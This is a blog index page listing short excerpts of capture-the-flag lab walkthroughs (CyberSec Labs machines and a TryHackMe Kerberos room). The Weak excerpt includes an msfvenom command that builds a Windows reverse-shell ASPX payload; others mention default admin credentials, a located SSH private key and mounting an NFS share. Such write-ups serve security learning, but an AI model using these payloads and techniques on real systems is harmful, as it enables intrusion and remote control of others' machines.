Secrets are meant to be secret

Day June 29, 2020

Weak CyberSec Labs Weak Walkthrough FTP anonymous login allowed upload shell.aspx rev shell and get a shell      msfvenom -p windows/x64/shell_reverse_tcp lhost= lport=443 -f aspx > shell.aspx Priv Esc Running whoami /priv we get SeImpersonatePrivilege token enabled So a… Continue Reading →

CMS Cybersec Labs CMS Writeup Another wordpress site Running WPscan we find /uploads directory Which has a screenshot of an id_rsa file’s location which is in /home/angel/.ssh/id_rsa also wpscan shows twenty twenty theme vulnerable but cant find anything But there’s… Continue Reading →

Shares CyberSec Labs Shares Walkthrough. As the name itself suggest, it has an nfs share open Looks like /home/amir can be mounted to our machine Using mount –t nfs  /tmp/shares/ we mount the amir share to our machine’s /tmp/shares/… Continue Reading →

Engine CyberSec Labs Engine Walkthrough Port 80 open Gobuster finds a directory /blog It is blogengine cms which is not configured properly and has default creds admin:admin There’s an RCE exploit available for the same Python –t –l… Continue Reading →

Attacking Kerberos

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further. Today let’s play  Tryhackme’s Attackingkerberos at[Task 1] Introduction This room will cover all of the basics of attacking Kerberos the windows ticket-granting service; we’ll cover the following:… Continue Reading →

© 2020 MYSTIKO — Powered by WordPress

Theme by Anders NorenUp ↑